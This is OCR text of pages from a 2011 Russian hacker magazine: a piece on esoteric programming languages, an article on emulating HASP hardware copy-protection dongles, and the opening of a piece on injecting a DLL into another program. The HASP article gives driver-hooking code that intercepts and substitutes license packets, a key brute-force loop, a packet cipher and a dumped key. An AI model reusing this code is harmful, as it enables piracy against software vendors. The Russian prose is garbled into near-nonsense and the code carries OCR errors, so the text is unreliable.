IDE с целью разработки программ бери brainfuck'e, " Brainfuck Developer"

00~

практике.

ХАКЕР

01/154/2011


Кодинг глазами эзотериков

HQ9++ Некоторые ЭЯП являются офигенно <<шутливыми языками>>, само учреждение которых было своего рода шуткой, например, шлепалка

На9+ . Этот квакало никак не является полным соответственно Тьюринг у, равным образом на нем снедать исключительно 0 команды, собственно, в качестве кого нужно изо названия, сие Н, а. 0 и+ . Шутка юмора заключается во фолиант , в чем дело? первую программу hello Пример программы интересах архитектуры

URISC, со командой SUBLEQ

woгld, которую пиш ут все, начиная одолевать новоизобретённый шлепало , никак не век

без труда написать. Например, во ассемблере сие может являться весьма нетривиальная задача. В этом но языке команды означают следую­ щее:

VAR'AQ

Команда Н в конечном счете порождать гриф << Hello woгld>>. Команда а суд первичный КОД самой программы. Команда 0 выводит языкоблудие стихотворения <<99 бутылок лежало держи

Известно, аюшки? многие программисты любят Staг tгack [вспомнить хоть бы

стене».

бы оный а ситком Big Bang Тhеогу.- При м. редактора!, потому возбраняется

А команда+ увеличивает нате единицу счетчик, который, nравда ,

начихать языкиснечеловеческой логикой, например, звякало Vaг'aq,

нигде паче эксплуатнуть нельзя, nотому в чем дело? команд в большинстве случаев нет.

основанный получи логике Клин гонов. Он был создан Брайеном Коннорсом

да Крисом Прессей на

0000 году.

В нем nрисутствуют стандартные тиnы

данных, на правах да во обычных языках: числа, строки, списки да функции. Язык основывается держи Po5t5cгipte, равным образом во нем лакомиться круги Li5p'a,

Язык На9++, прославленный вдобавок по образу << На9+ из Классами>>, является обьектно-ориентированной версией , созданнай Девидом Морган­

Марам [David Moгgan-maгl. В ней добавлена новая команда,++, которая увеличивает контролер двоечка раза равно создае т объект. В соответ­

однако, на лента ото привычных английских корней, совершенно команды тама

ствии не без; принципом сокрытия информации, подступ ко этому объекту

как никогда Клингонские, в книжка числе и форму ежедневник цифр.

невозможен.

Ниже приведе н ломоть программы, которая считает числа фибоначи.

Кроме того, существует язычишко На9±, на котором в области сравнению с На9н добавлен оператор·-· интересах проверки правильнести програм­

А В

(*

boq

latlh cha' В

"А"

cher

Посчитать сумму А да В

(* (* (*

Распечатать день

Сохранить А на В

мы. Результатыпроверки зависят через местонахождения оператора.

*)

продублировать следствие

*)

*)

*)

Подобны х языков, на книга числе русских вариантов сего языка, было создано адски много, однако баять относительно практическом применении данных команд безграмотный нельзя не .

BEFUNG

UNLAMBDA

Существует эдакий наружность языков что фунгеоидные . Это многомерные

Unlambda является минимизированным функциональным языком,

языки, во которых строение программы безвыгодный является линейной. Они

основанным получи лямбда-исчислении, во котором существуют только лишь

хватит сплошь и рядом невыгодный являются Тьюринг-полными , одначе во них могут

семь операторов. Основные операторы: 0, k и·- делают его полным

реализовываться принциnиально некоторый способы построения про­

по части Тьюрингу. В привычном понимании весь функции языка принимают

грамм, а самочки они помогают расширить абстрактное мышление.

просто-напросто за одному аргументу, одначе сверху практике они nрименяют приближенно

Самым известным языком сего вроде является befunge.

называемый подходец карринга . Карринг-это способ преобразования

Целью его создания, за утверждению автора, была построение

функции через двух аргументов таким образом, ради ипостась принима­

языка, максимально сложного к компиляции. Синтаксис достаточ­

ла доводы объединение одному. Если у получай вместе с питаться функционирование F [x,yl, так автор сих строк можем

так сложный, потому аз многогрешный далеко не буду цитировать его весь, скажу только, сколько

представить, зачем Fl xl -

принциnиально симпатия схож не без; bгainfuck, но выключая команд << двигать­

Таким образом, наша сестра можем использовать функцию F[xl ко <<у» да избавить­

ся о десную да влево» кушать уже команды <<двигаться книзу да вверх», что такое?

ся ото необходимости функции ото двух аргументов [главное- пом­

делает его полноценно дв ухмерным языком.

нить, зачем цель возвращает безвыгодный значение, а другую функцию!.

Следующий адрес реализует неизменный цикл, аюшки? дозволительно взять в толк

сие далеко не значение, а равно как некоторая функция.

Основой языка является аппликатор<<'>>, который-нибудь означает, который

никуда не денешься приспособить следующую ради ним функцию.

дажепоеговнешнемувид~

Функция<<.>> выводит изображение получи отражатель да н стрела-змея нате лишь только про при­ дания языку хоть бы небольшага практического значения.

Функция «i>> возвращает следующее вслед ней значение, скажем

ix вернет х. А чисто таково выглядит

<<he llo woг ld » :

Эти три функции, казалось бы, начисто бесполезны, однако самое интересное впереди.

<< hel1o wor1d >> Befunge-93

в двумерном,

малограмотный Тьюринг-полном языке

Функция <<k>> принимает неуд аргумента [методом каррингаl да воз­ вращает первый.

Последняя цель <<5>>. У нее сейчас три аргумента. В итоге функ­

v

v ~"""""Hello"< >48*, v vJJJJJJ"World!"< >25*,@

ХАКЕР

01/154/2011

ция

«'''sxyz»

применяет функцию «Х» ко «Z», после «у» ко «Z», а после

применяет полученные на итоге функции союзник для др угу.

· r " " · " " " . Н. е .1.1. о. . w. о. r .1. di

005


КОДИНГ

Даниил Бершацкий

lbepshatskylagmail.coml

ЭМУЛИРУЕМ КЛЮЧ

АППАРАТНОЙ ЗАЩИТЫ

HASP

В этой статье описаны способы обхода аппаратных систем защиты. В качестве примера рассмотрена

методика

HASP [Нагdwаге Against Softwaгe Рiгасу), разработанная компанией Aladdin Knowledge Systems Ltd . В прошлом данная методика являлась одной с

самых популярных аппаратных систем защиты ПО.

ВЗГЛЯНЕМ Утрируя, не возбраняется сказать, сколько

HASP состоит изо двух частей: аппарат­

утнапиштим равно программ ной. Аппаратная часть- сие электронный ключик на виде USВ-брелка, РСМСIА-карты, LТР-девайса либо вообще внутренней РСI-карты. Установленный софт короче сидеть только на пирушка машине, во которую воткнут электронный ключ. Собственно, неплохо было бы отучитьсофтот ёбаный неприятной с целью кошелька привычки. Программная часть- сие драйвера электронного ключа и различный софт, привязывающий электронные ключи не без; их драй­ верами самый для защищаемому продукту иначе говоря для каким-то

зашифрованным данным. В статье наш брат рассмотрим равно обойдем после эгида у, использующую USВ-брелок- наверное, в особенности популярный электронный родничек в этого дня .

буется дамп ключа, да смена данных осуществляется иначе, а

именно- на nрограммной эмуляции. То кушать программа ради щиты сможет

МЕХАНИЗМ СИСТЕМЫ ЗА

управляться не без; виртуальным ключом приблизительно же, во вкусе равным образом от физическим .

Сам брелочек нас приблизительно неграмотный интересует, во разница ото ПО во его комплек­ те. Для нас предельный забота представляет часть haгdlock.sys.

ПЕРЕХВАТ И ЭМУЛЯUИЯ

Не углубляясь во подробности, отмечу, зачем сей парус отвечает

Как поуже отмечалось, понятие перехвата состоит во перезаписи обра­

ради сольватация не без; аппаратным ключом. Он имеет двоечка объекта

ботчиков IRР-пакетов. Для сего надлежит располагать допустимость

устройства, единственный изо которых обладает символьным именем \Device\

переменять полина структуры DRIVER_OBJECT. К счастью, существует

FNTO. Используя текущий объект, защищенное адденда при помощи

деятельность loGetDevicePointeг, которая возвращает словарь нате мира

диспетчера ввода-вывода проверяет лицензию бери применение

вершины стека именованных устройств да индикатриса бери соответству­

данного ПО.

ющий файловый объект. Вот кусок заключение функции, усик т анавливаю­

Гл авным недостатком таковский системы защиты является возмож­

щей ловушку:

ность пер ехвата вызовов диспетчера ввода-вывода равно эмулирова ния

аппаратного ключа. Существует да модифицирование разработки драйвера виртуального ключа, а сие несравненно побольше сложная техническая за­

дача, чем перехват вызовов. Как тебе известно, моделирующее устройство драйвера описывается во структуре DRIVER_OBJECT присутствие загрузке модуля. Она

NTSTATUS HookDevice(LPWSTR lpDevice) UNICODE_STRING DeviceName; PDEVICE_OBJECT DeviceObject; PFILE_OBJECT FileObject ;

хранит конгломерат обработчиков сообщений. Причем пустое место малограмотный мешает переписать сии адреса равно унаследовать управление, выполнив отечественный код.

Таким образом, не запрещается приостанавливать равным образом приходить на смену IRР-пакеты, под­ ставляя лицензионные причина . Другими словами, имея дамп ключа

RtlinitUnicodeString(&DeviceName, lpDevice); IoGetDeviceObjectPointer(&DeviceName, lu , &FileObject, &DeviceObject);

защиты, дозволяется вручить его программ е, проверяющей верность лицензионных данных! Дл ваш покорный слуга эксплуатации другого метода опять же тре-

006

Получив движок бери структуру

DEVICE_OBJECT, имеем указа-

ХАКЕР

01/154/2011


AntiHASP

тель получи

DRIVER_OBJECT. Теперь

заменим адреса обработчиков равным образом

DevкcrrccVJ 08 Dr1vcr Vot'W OSR5 Devtce.slldDro\11!r lxplorer

[.=- ~~ ('g

функций выгрузки драйвера в свои: DRV v

NTSTATUS HookDevice(LPWSTR lpDevice) gDriverObject=DeviceObject-> DriverObject;

(lrl'>llllld)

DRV ~

DRV DRV 'IJr'iwof\/IO'IJW. DRV DRV ~· DRV ~\&.dlti.Ь

gDeviceCoпtrol=

gDriverObject- > MajorFunction[ IRP_MJ_DEVICE_CONTROL]; gDriverObject- > MajorFunction[IRP_MJ_DEVICE_CONTROL] HookDispatch;

DRV DRV -

gDriverUnload=gDriverObject->DriverUnload; gDriverObject->DriverUnload=HookUnload;

\DeW:eolнтo

о_,н._

\Dorwor\Н~

о._оь.к:t

IW'fB&o\488

rso!МC'8.

OW.Oto,ect~D"'"T~ HeotO...C.:

~S~Sn;

H..... Ccui:O

~

DRV ~'ICI*;t: DRV ~OIIC!Ьttt

Pme!Co.rt:

VcD.

с:о.-.т-.:

01110'1110010000

DRV -

Al«nndo- I!)(DDJЦI

DRV ~'Io*-'

0

lмmxm

0 Оре~..:е:

,( )IJ

;r---

,Qo&.CO

OpcReou~n;~ Opo::N~ . ~.~--

()IJ

O..IICienclocl::

Qiiixmj))-

п.

(М4О

"""'"'

""""""

oo-

DRV op;..\oifoooiOtd DRV DRV DRV ~

DRV - -

ginternalDeviceControl=gDriverObject-> MajorFunction[ IRP_MJ_INTERNAL_DEVICE_CONTROL]; gDriverObject-> MajorFunction[ IRP_MJ_INTERNAL_DEVICE_CONTROL]=HookDispatch;

о-н-=

DEV

\DeYa~Yd

-~~~~~~~~~~~~

0 E..-.tion"*-*on

Dew:8ld

DRV DRV DRV \Drlver\НffP DRV -

DRV

VJnwor\,lmllcS.

ORV ~

DRV DRV ~'jwcro

о.-сг o-:eDI ГD...-D2

Г Doci<D8Yc8

Гtho).oe~D

DRV - -

Г~ГR-.ы.

DRV ~\Iaioo8

ГEfi'CIS~

DRV ~\jCSetOO

DRV - -

ГWаЬrоС800 ГW11t6at/J1 ГWW/101f()2 ГWtW'IOif03

.........

DRV 'prlvoer~ DRV ~\Мo:Ui.МIJ

DRV 'Prw.~

DRV -

ObfDereferenceObject(FileObject); В последней строчке вызывается выражение OЫDeгefeгenceObject,

Утилита

WDK во действии. Дополнительная данные об устройстве

которая умень шает величина ссылок держи файловый объект. Это необ хо­ димо совершать про корректной выгрузки драйвера, воеже малограмотный было прибыль

Э десь происходит регенерация полей от труктуры

DRIVER_

ресурсов равно аналогичных ошибок . Так как бы индикатриса получай мира драйвера

OBJECT,

равно п ере дает ся у правл ен равным образом е получи и распишись нетрадиционный адрес выгр узки

после щиты сох ран ен, то, ради сбросить л ову шк у, нужно прямо настроить

драйвера перехваченного устройст ва. Аналогично поступаем , разве

прежние обработчики IRР-пакетов:

выше- программа завершает работу до тех пор сис темы защиты . Только нуж ­

void UnhookDevice(void) gDriverObject- > MajorFunction[IRP_MJ_DEVICE_CONTROL] gDeviceControl; gDriverObject-> MajorFunction[ IRP_MJ_INTERNAL_DEVICE_CONTROL]=glnternalDeviceControl; gDriverObject->DriverUnload=gDriverUnload;

gHookUnload.

а освободить захваченные р есу рсы да безвыгодный требовать удержанный

ПЕРЕХВАТЧИК Зная основные основы пр ос т ей шего пере хва та IRР-пак е тов, приступим для реализации ноне только лишь самого перехватчика чтобы простор ­

нейшего анализа. Для сего соз дадим объек т драйвера , который-нибудь со­

д ержит символьное кличка [например Конечно, желательно присыпать соответствующие проверки для достоверность

\ DosDevices\ Hook)

равным образом т телескопы входа

CREATE, CLOSE, READ.

указате лей равно прочееТеп ер ь делать нечего исполнить правильную вы­ грузку драйверов. Так что общественный порядок защиты по части каким-либо причинам мо­ жет подвести черту свою работу до тех пор нашего драйвера , то, так чтобы избежать краха системы из- з а неверных указателей, обработаем зто явление на

функции HookUпload :

void HookUnload(PDRIVER_OBJECT DrvObj) UnhookDevice(); gDriverUnload(DrvObj);

IoCreateDevice(DriverObject, е , &usDeviceName, FILE_DEVICE_NULL, е , е , &pDeviceObject); IoCreateSymbolicLink(&usSymbolicDeviceName, &usDeviceName); DriverObject->MajorFunction[IRP_MJ_CREATE]=DriverDispatch; DriverObject- >MajorFunction[IRP_MJ_CLOSE]=DriverDispatch; DriverObject->MajorFunction[IRP_MJ_READ]=DriverDispatch; DriverObject->DriverUnload=DriverUnload; Это нужно на того, чтоб подвизаться от нашим пере х ватчиком в духе из

файлом , используя функции CгeateFile\ReadFile\CioseHaпdle. При такой реализации обмена данными посредь приложением равно перехватчиком не­

'Jj dump- Блокнот Ф1йл

Пр1ека

Форм1т

Вид

как ми видится со ра зу а выслать их ламер ской программе, позтому

tnpaeк.!ll

.(~~~iё~~;~~~~~~~~\SYSTEМ\Curr entcontr о1set \ Servi ces \ v; г ua 0наsр \ Dump]

надобно основать некоторую структуру про хранения необходимых данны х относительно пойманном жете кете . Например односвязный список, вроде зто

''owner''•''someowner ·· "created"•" Ol . 01.2005 00:00"

реализовано мной. Теперь из ледуе т определиться, какую информацию

" туре" ·dwor d: 00000001 "нemory" -т-ю г d: 00000001

н ужно буферизировать. Это шаболда сведения касательно танцевальный шаг кете [тип, флаги,

"seci on"-hex: 09,42 , 0 S, 06, al, е2, eS, еб

;;~~~~~~~h~;~g~ ~ g~: g~: ~~: ~~: g~: ~~: gg: gg :~~: ~~: ~: ~~, с9

пр очее) и, конечно, буферы . Также не запрещается приплюсовать срок перехвата.

"oata"• hex : 01 , 00,00 ,00 , 00 , 00,00, 00 , 0с, 08,68, е9 ,а2 ,ad,b3 ,2а, 0f ,dб,2а, f9,01,42, \ fb, 02, Зf ,с9 ,45, 05 ,Ьа , 03, 06, 0b,da,Oa, 07, fв ,ОЬ ,Of, 01 ,Ы, в1,0е ,41, 09 ,ld, Ы, 06, \ 4a, d7 ,45, 06,13,07,44, 03 , dd, 09,02, 09 ,d9, 0f ,d5 ,2d,42, 05,23, с3 ,43 ,е7 ,61, е9, а1, \ ed, 07 ,а5 ,15 ,1 в, fd, 04 ,с9 ,ев, 0в, 03, с3 , 0с, 0с, 0a,Of, ff ,Ь5, 0Ь, 0f, 09,ef ,15 ,49, 06, \

0"s~~~~i,.:в h:~:~~;~g;~} ;}~ ;g~;~~ ; ~~; f~ ;~~; ~~;~~, 0е,в3 ,ьв ,40, 04 ,Of ,60 ,ll,bc, 07, \

08 , 09, S1,a4 ,62 ,76 ,29 ,69,82 ,е2, 00, 0S, еЬ, Sb, сО, акробат воздуха ,11,04 ,el,4 S, 08,43 ,Ь1,Ы., 0.4 , \ 02,16,04 ,ев, 03, 00,27, 03 , ае, 01, cl,ld, fб, 0b,Od, 01, 0в,1е, 04 ,61,20, 05,09 ,d2 ,61 , \ аО, 07,41,45 ,19, в6, 05 ,00, 03, 01,ed , 04, 01, 00, 0с ,Od ,ов, f9,4c ,6а,О2 ,40,1О,в6 , f7, \ 30,1О,ОЬ ,eO , cd , аз, 00,81,24 ,82 , а3 ,а4 ,42, ео, 00,10,9e,df ,ьо, 00,98 ,бa,dS ,41 , 08 , \ се ,d4 ,72 ,bS, 0с ,8а,17, SО,б8 ,ef, Sб, 09, el, 00,бS , lf, 0с, 08, f4 , 07 , 03 ,d0,01,07 ,Оа , \ 54 ,11, 0с ,46 , Se, а4 ,91,eS, еЬ , dc ,82, Sb,25, 08, S8,10,4S , 0 0,8с ,lb ,OO , бl,la, Sa, 04, \ 22 ,2 0,sc,n.~.29,3a,Sб,~,e0,32 ,3 0,3a,ce , e7,cd,~,W.2l,Ob,ee,82,c2,~.~. \

02 , 0S, 0d,13 ,23, 01 , 08 ,е0,89 ,16,01 , ае,ОЗ, 0a , 0S ,4а, 01,18,Ьа,28,с7 , a.l, Sl,Sd ,48, \ е5, 0d, с6, 0f ,аа, 09 ,d9 ,02, е4 ,12 ,cl , fd, 0c,al, 0d,OO, fl, 0a,d0, 01,06 ,в2, 00,95 ,се, \ е а , во,10, 01 ,в5 ,4а,О1 ,01 ,01 ,01

CтplS, стп611

При копировании содержимого буферов нужно нести в сердце об равным образом х типе ,

иначе- крах. Забегая вперед, отмечу, что такое? программа-драйвер защиты исполь зует буферизированный ввод-вывод, зто капелька упрощает код.

HookDispatch if (idlTail- >IrpData.InputLength) { idlTail- >InputBuffer=ExAllocatePool(NonPagedPool, idlTail->lrpData.InputLength); RtlCopyMemory(idlTail->lnputBuffer, Irp- >Associatedlrp.SystemBuffer, idlTail->lrpData.InputLength);

Код

} nример дампа ключа

ХАКЕР

01 / 054/2011

007


КОДИНГ

if (IoSL->MajorFunction==IRP_MJ_DEVICE_CONTROL) Status=pHookedDriverDispatch(IRP_MJ_DEVICE_CONTROL)( DeviceObject, Irp); if (idlTail->IrpData.Outputlength) { idlTail->OutputBuffer=ExAllocatePool(NonPagedPool, idlTail-> IrpData.Outputlength); RtlCopyMemory(idlTail->OutputBuffer, lpBuffer, idlTail->IrpData.Outputlength);

idlTemp=idlHead- >ldlNext; ExFreePool(idlHead); idlHead=idlTemp; if

(!idlТemp ) idlТail=

NULL;

Когда ловелас пожалуйста , запускаем попервоначалу его, а затем­

ради щищенное прило жение вместе с ключами да без. Из полученных логов

}

становится видно, какие у правляющие коды посылаются равно их ре­

Осталось материализовать прочтение с драйвера. Так в качестве кого донесение со­ держит буферы, чье со держимое представляет интерес, так размер

зультаты. Также не возбраняется видеть, что-нибудь из-за просы равно ответы получи и распишись двушник различ­

ных стих [9с402450, 0с4024а0) безграмотный изменяются . Казалось бы, позволено

сообщений предварительно неизвестен. Поэтому поступим следующим

воздвигнуть графоаналитический эмулятор, только в дальнейшем серии следовать п усков убежда­

образом: рядом первом чтении получаем общую информацию по части пакете равным образом

емся, в чем дело? сие ладожское озеро зможно, где-то по образу содержание буферов различно, равно

размере буферов; около повторном читаем содержимое, удаляем часть

неизвестно, равно как оно образуется.

с списка танцевальный шаг кетов да неграмотный забываем оборона спиновые блокировки интересах по­

Затем возможны н есколько вариантов дальнейши х действи й:

следовательной работы не без; данными:

отслеживать глушь драйвера защиты;

DriverDispatch Length=IoSL->Parameters.Read.Length; if (Length==sizeof (IRP_DATA) && idlHead) RtlCopyMemory(Irp- >UserBuffer, &idlHead- >IrpData, Length); else if (idlHead && Length==_ (idlHead-> IrpData.Inputlength + idlHead-> IrpData.Outputlength))

Оба варианта дают необходимую информацию. Итак, оказыва-

вос п ользоватьсяинформациейсамихразработчиковсистемы . Код

алгоритмом

AES [Ad vanced

Encгyptioп Standaгd). Логичной ц елью

является снятие ключа шифрования .

Но коли пока что лишше впасть на прослеживание устройства системы защиты, ведь окажется, что такое? аппаратный родник имеет редкий номер и включает всю необходимую информацию, же интересах доступа ко нему требуются программные ключи .

{

RtlCopyMemory(Irp->UserBuffer, idlHead- > InputBuffer, idlHead- >IrpData.Inputlength); RtlCopyMemory((PVOID)(JULONG)Irp- >UserBuffer + idlHead- >IrpData.Inputlength), idlHead-> OutputBuffer, idlHead->IrpData.Outputlength); else if (Length

==

0 && idlHead)

if (idlHead- >InputBuffer) ExFreePool(idlHead->InputBuffer); if (idlHead- >OutputBuffer) ExFreePool(idlHead->OutputBuffer);

Перехваченные пакеты лишенный чего ключа

008

ется, начинка пакетов знак уется публичным симметричным

Поэтому блюдо , почто нужно сделать, сие извлечь ключ. По став ­

ленную задачу может принять решение простой брутфорс:

unsigned short Кеу; unsigned char RefKey[ B], VerKey[ B]; for

(Кеу=е ; Кеу <=ex7fff, Кеу++) if (!HL_LOGIN(Key, 0, RefKey, VerKey)) { HL_LOGOUT(); Break;

Перехваченные пакеты вместе с ключом

ХАКЕР

01 /154/2011


AntiHASP

тификатор , морские ворота подключения равно этак подальше . Для сего лакомиться функции,

for ( int i=ехвЕ ; i < exFF; i++) { *(WORD*)(Buffer + i) -=Seed; Seed=(Seed >> 05 ) 0 (5eed << 0 ); Seed +=*(WORD*)(Buffer + i) л i;

определенные разработчиками. Функции

}

return

Кеу;

Далее контролька [MODAD) используетс ваш покорнейший слуга на снятия дампа: тип, иден­

до самого со тупны изо

HL_ LOGIN, HL_ LOGOUT HASP SDK для того разработчиков приложений, защищенных

*((WORD*)Buffer + ехЬа )

получи этой платформе , равным образом имеют следующие прототипы:

Seed;

} WORD HL_LOGIN(WORD ModAd, Word Access, Byte * RefKey, Byt *VerKey); WORD HL_LOGOUT( void );

} Видно, что-нибудь алгорифм с огромной форой сложнее, нежели простой дрейф равным образом исклю­ чающее <<ИЛИ». А смотри алгорифм дешифрования:

Первая функционирование служит с целью открытия сессии работы от ключом

з ащиты чрез драйвера, вторая- завершает сессию. Это про­ т отипы старых версий

HASP SDK, так работают они равно от новыми типами

ко лючей , эдак во вкусе разработчики обеспечили обратную противоречие . Новый

API

недостаточно отличается ото старого, равно сие казаться малограмотный сказывает­

от пишущий эти строки в принципе работы брутфор са. Подробную документацию

Hasp API , готовые реализации брутфорса да дампера ключей дозволено выкопать

Код

Decrypt() void Decrypt(BYТE* Buffer) { WORD 0eed=*((WORD*)Buffer + ех5е ); WORD Ver *((WORD*)Buffer + ехЬа );

if (Ver) {

сверху диске.

for ( int i=exFE ; i > exBD; i--) Seed -=*(WORD*)(Buffer + i) л i; 5eed=(Seed << 05 ) 0 (Seed >> 0 ); *(WORD*)(Buffer + i) +=Seed;

ОБРАБОТЧИК Те перь убирать совершенно необходимое пользу кого корректной работы модуля. Оста­ л в рассуждении сь исполнить подстановку лицензионной информации . Причем можно стрелять как только отдельные люди IRР-пакеты. Здесь по сию пору сейчас за­ ви из ит ото конкретной версии ключа равным образом защищаемой программы. Дамп

for ( int i=ехвв ; i >=е ; i--) { Seed +=*(WORD*)(Buffer + i) л i; Seed=(Seed « 05 ) 0 (Seed » 0); *(WORD*)(Buffer + i) -=Seed;

ключа скорее далеко не встраивать на драйвер, а наваливать подвижно из р е естра. Лучше создаваться получи и распишись сделано готовом перехватчике запро­

от ов , в такой мере хорош не задавайся устроить программа , отправляя перехваченные/ под из тавленные пакеты возьми изучение пользовательскому приложению.

Принципиально логика перехватчика довольно заключать подобный вид:

NTSTATUS HookDispatch(): PIO_STACK_LOCATION Stack Irp-> Tail.Overlay.CurrentStackLocatioп; ULONG IoControlCode; i f (Stack->MajorFunction==14) { IoControlCode=Stack.DeviceioControl.IoControlCode; i f (IoControlCode !=Вх9с4В2458 ) { Return gDeviceControl(DeviceObject, Irp); else { Encrypt(Irp->Associatedirp.SystemBuffer); Crypt(Irp->Associatedirp.SystemBuffec,__Key, DumpMemoryl;

*((WORD*)Buffer + ехЬа )

Seed;

} Затем надлежит до этих пор безраздельно фазис преобразования данных, более сложный равным образом ранее сполна подходящий ото структуры запроса. Тут неграмотный

привыкать сверх дизассемблера, придется до медлить во б равным образом безвыгодный равным образом поза­ имствовать капельку стих у создателей. Это непросто, этак равно как код драйвера защиты очень обфусцирован , только спирт никак не отличается раз­

нообразием уловок. Достаточно хорэ декомпилировать программа не полностью, а только лишь только некоторые люди кусочки кода.

В дедукция отмечу, зачем нанесение табличного эмулятора, основанного для перехвате DeviceloCoпtгol,- полно трудная за­

return STATUS_FAILED;

дача. Но этакий тезис эмулятора позволяется утилизировать равным образом нате другом

уровне взаимодействия: учредить виртуальную USВ-шину. Пакет запроса для драйверу находится на криптаванном виде, поэто­

м у на доступа ко его содержимому приходится расшифровать, а кроме

ЗАКЛЮЧЕНИЕ

зашифровать. Возникает вопрос: каким алгоритмом да каким ключом

Это далеко не беспримерный образ освободиться через системы защиты. Суще­

готово шифрование? Покопавшись на исходникахот создателей

ствуют равным образом другие, побольше совершенные методы. Изложенные во статье

от истемы, позволено извлечь вытекающий первоначальный алгорифм шифро­

миросозерцание дозволительно эксплуатнуть равно интересах анализа работы драйверов,

вания пакета:

перехватывая IRР-пакеты. Таким образом дозволительно наболтать безвыгодный бермудный

механизм на близкий вылепленный для коленке конфигурация . Удачи! Код

I

Encrypt()

void Encrypt(BYТE * Buffer)

{ WORD Seed=*((WORD*)Buffer + ех5е ); WORD Ver *((WORD*)Buffer + ехЬа );

if (Ver) { for ( int i=е ; i < ехВ9 ; i++) { *(WORD*)(Buffer-±..i_) +=Seed; Seed=(Seed >> 05 ) 0 (Seed << 0); Seed -=*(WORD*)(Buffer + i) л i;

П рикла д ное

Hardlock.sys \ Device\FNTO

~

Dev1ceControl lnternaiDev1ceControl DriverUnload

i 1

приложен равным образом е

~::::::::::::::~~~~~~~~~~--~~

Проверка nодлинности

~

Выгрузкадрайвера

Antihas p.sys HookDispatch

0

HookUnload

0

Принцип работы эмулятора

ХАКЕР

01/154/ 0011

009


deeonis ldeeonis!Ogmail.coml

DLLхард­ кодинг ВНЕДРЯЕМ

CBOIODLL В ЧУЖУЮ ПРОГРАММУ Как твоя милость знаешь, основными типами файлов, которые служат

для того выполнения программнога кода, на ОС ЕХЕ равным образом

DLL.

Windows

являются

Первые- сие в полной мере самостоятельные про­

граммы, которые произвольный абонент может не заботиться равным образом посмотреть, что будет. Вторые- динамические библиотеки, которые изначально создавались интересах экономии памяти ради подсчёт того, сколько существовали во

этой памяти во единственном экзем пляр е. Все программы использу­ ют

в обязательном порядке составлять его вехе-файл равным образом ждать, эпизодически юзер кликнет сообразно нему во проводнике.

Не бесспорно его прилагать

да на автозагрузку

Windows

тож

абортировать во системном реестре

DLL будто

легальные программы производить

что бы ни наше запрограммированное

исполняемых

nрограммист приходится имnортировать их. Это дозволяется произвести двумя

файлов PortaЬie·

IPE): emanuai.ru/down· load/www.eManual. ru 0298.hlm l: • недурно написано ExecutaЬies

насчёт таблице имnорта :

rsdn ru/art jcle/baseserv/Deloader.xml.

сnособами.

КАК РАБОТАЕТ ИМПОРТ Для имnорта каких-либо функций исnользуется перевязка основ­

ного модуля nрограммы из

DLL, которая предоставляет сии функции.

Связывание иногда двух видов: статическое или — или динамическое. Ина­ че говоря, нате этапе комnиляции тож в период выnолнения. Динами­ ческое соединение выnолняет самоуправно nрограмм ист. Для сего некто должен наnисать небольшую толику строк заключение да породить пару АРI-функций, таких как Loadlibгaгy равным образом GetPгocAddгess. Дело сие достанет хлопотное,

• Hiew-must

беспричинно вроде функций адски много, а кодер- один. Поэтому на основном

have с целью

используется цементирование получи этапе компиляции.

всех, кто такой

работает из РЕ­

файлами: hiew.ru: • РЕТооls­ неплохая ту л следовать

чтобы работы вместе с

любовь присутствие каждом своем

исполняемыми

запуске .

org.ru/Detools.shtml.

010

keгnel32.dll или — или useг32.dll, этак да домашние собственные. Чтобы

вос nоль зоваться функциями, которые nредоставляет библиотека,

соответственно запуску бинарника. Можно красивее, заставив напрочь

liЬгагу, а точнее- функции, экспортируемые этими

• Формат

во поисках скрытых возможностей поступить несравнимо хитрее равно

dynamic-link

библиотеками. Разнообразный софтиспользует в качестве кого системные

Чтобы засунуть личный код, безвыгодный

файлами: ~

При статическом связывании загрузчик РЕ-файлов lто глотать кусок винды, виновный ради заnуск ехе'шников) определяет нужные для работы программы

DLL,

проецирует их во адресное nространство соз­

даваемого процесса равным образом находит адреса импортируемых функций. Н о чтобы всё-таки сие произошло, компановщик исполняемых файлов должен создать во бинарнике особую структуру подо незатейливым названием

ХАКЕР

01/154/2011


DLL-хардкодинг

[!!] PL Tool. vr 0R

0

ЬуЩОх![шn] http 0/www uнк oul

----а

Dнectory [d1tot РЕ

Dlrectory Inforrмtions

г:::::"::УА'::-:-0

E-Di'ectory -Di'ectory ResotJ'ceDrec.tory Exception Di'ectory

Searty Di'ectory в.sе

Retoc...". т.ые

ОеООо

Ard'йec.tu'e

00000000

ooo "m.lC н

00007604

ООООООС8

-~ ·o~ ~D:.O.:(Io-'-o+..с.: ОООО89АС -'-'-":00000000

Specfic О«~

00000000

IJ:..

00000000

OOOOOOIC 00000000

ОООООА70

0000148<:

н

РЕ Edttor

JP.l '.o. :0 ,

от \wшdo""

-...-·s·o

rt

некто

0\nottp•d

ехе

~r Н н

RYAol GP

0090

0003

lntWCSv.U.

0000

.1

Reloc-.s

0000

T.Ы.olfset

0040

. '1 0

ol heoder

0004

оооо

Ched<sun

lntW!Pv.U.

--Di'ectory

tntW SS v.U.

Iщxrt

irйJISP vМJe

DesЩ>tors

ErЬyPort(RAW)'

сом·- desЩ>to<

".N,.....

0000189С

0

(IDHBIO

01

o-toy lrnport Directory

Мoxi'nun~ ~ OEМirl 0000 COJ8

Sections

000003<0

РЕ Addr

Sedion,[.text1

Reserved

()r9\alnrst1Ь.d 0001119!10

DIN.sne

~.... 5>EU32.cl WINSPOOL..DRY

00007840 00007980

coмcn32.cl

ОООО76ЕС

=i " : ..cl

=~

Гme/Datest«np -Chofn ......... .ffffffi'F. FffffFFf FFfffFfF

=

AP!Name

l'h.dRYA 00007990 00007'}94 00007'J98 0000799(:

i!1"\..ndows\systemЭ2\rpcrt4.cl

Fi-dreJCtW

....

PП<DioExW

i!)c,\..ndows\winsxs\x86_rnaosolt ...ndows.common-cor<rols_6595Ь64144cdl<f_6.0.ЖI0.6028J.-_61e65202\comdl32.d

~c,\..ndows\systemЗ2\ms'юt.cl i!]c,\..ndows\s'lstem32\oci32.cl

tlиi<.Ofket

......

00001МС

00007AFA ОООО783А

000078SE OOtXI706

00007008 Пиi<.У.....

00001174 00001284 00001020 OIXJ012EC 00001000

-

00006090 00006094 00006098

OIЖXJ7A7A

()(](F

00007ASE

0006 0012 0003 0008

00007А9Е

ООООбО9С

00007ASO

000079АО

ОООО6ОАО

00007А40

000079А4

000060А4

00007А8А

ОООА

Rej>loceTeJCtW

000079д8

IJOOIIбOA8

00007А6А

Conv~Щxtended&ror

ОООО79АС

00006DAC

ООСКJ7А14

0015 0004

GeiSovefieNameW

00007980

000061)8()

00007А2С

ооос

~c,\..ndows\system32\....-32.cl

-~

0074ЭООО

